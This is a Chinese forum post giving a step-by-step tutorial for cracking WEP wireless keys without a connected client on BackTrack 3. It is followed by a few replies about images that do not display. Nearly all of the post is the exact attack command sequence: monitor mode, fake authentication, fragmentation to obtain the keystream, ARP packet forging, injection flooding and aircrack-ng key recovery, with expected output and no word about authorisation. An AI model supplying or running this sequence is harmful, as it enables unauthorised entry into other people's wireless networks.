BT3下破解无客户端wep简明教程

卉迪科技

BT3下破解无客户端wep简明教程（图文版）

1．装备： dell D410笔记本、linksys wusb54g v4 （加装12db 八木定向天线）、bt3 usb 系统  （如图）file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image002.jpg

file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image004.jpgfile:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image005.jpgfile:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image007.jpg



2．启动BT3,打开一个窗口，输入ifconfig –a 查看网卡  （顺便记下自己网卡的mac，后面要用到）
   我的网卡是rausb0

   再输入ifconfig –a rausb0加载usb网卡驱动

3.输入airmon-ng
start rausb0
6
激活网卡的Monitor模式

   后面的6 是你要破解ap 的工作频道  根据实际，换成你破解的ap的实际工作频道（下同）。file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image009.jpg

4.输入抓包命令，抓包并查看你要破解的ap的essid
mac
   输入命令
airodump-ng --ivs -w name -c 6 rausb0
，其中，rausb0是你破解用的网卡接口名（下同），这样，你的窗口将显示一个工作站，可以看到你要破解的ap的essid 和mac ，并记下ap的essid 和mac。
file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image011.jpg
5.上面窗口不关闭，另开一个窗口，输入命令，用自己的网卡连接要破解的ap
       输入
aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac rausb0
       这时，系统将回显
Sending Authentication Request

Authentication successful


Sending Association Request
Association successful :-)
file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image013.jpg

6．输入aireplay-ng
-5 -b ap的mac -h 自己网卡的mac rausb0
来获得xor文件
file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image015.jpg

如果一切顺利，系统将回显
Use this packet ?

输入y
回车，将得到一个至关重要的xor文件。file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image017.jpg

  再输入ls
查看当前目录，你将看到刚才生成的一个后缀名为xor 的文件。
file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image019.jpg

7．输入packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment -××××-××××.xor -w mrarp
其中，–l中的l是L的小写，别和1混淆，而其中的××××-××××.xor 是你刚才生成的文件名。file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image021.jpg

系统回显：Wrote packet to: mrarp

8．输入aireplay-ng -2 –r mrarp
-x 1024 rausb0 ，发包攻击.其中，-x 1024 是限定发包速度，避免网卡死机，我选择的是1024。file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image023.jpg

  输入y
回车  攻击开始  
file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image025.jpg
  这时，前面的抓包窗口上的data将迅速增加。
file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image027.jpg

  到数据增加到3万以上时，另开窗口，启动

aircrack-ng -n 64 -b ap的mac name-01.ivs

   其中
64 是64位密码，如果是128位，换成128即可。file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image029.jpg

另外，假如你用的是BT2系统，方法一样，但要对系统中的Aircrack进行升级。因破解环境往往无法在线升级bt2，故先将aircrack-ng-0.9.1.tar.gz 下载到本地硬盘，我是放在c盘的根目录下。
   用usb bt2 系统启动bt2，进入界面后，打开一个窗口，
   输入cd /mnt
   输入再输入 ls
   这样你就能看到你的硬盘名 一般是sda1 hda1 或hdc1（我的就是hda1）
   再输入

cd /mnt/hda1 或者cd /mnt/hdc1, 就是进入你的c盘根目录。
   再输入

tar -xf aircrack-ng-0.9.1.tar.gz
   再输入

cd aircrack-ng-0.9.1
再输入

make clean && make && make install
这样，你就可以直接在新版本下破解了，方法同上。

傲雪

((em:05))

卉迪科技

为什么显示不了图啊？？

咀嚼自己

为什么显示不了图啊？？
卉迪科技 发表于 2009-6-20 10:07

显示不了说明你没发好，还玩电脑类来，再说了这么多高端数字谁看得懂

卉迪科技

我玩电脑并不玩论坛，俺是论坛新手看不见吗？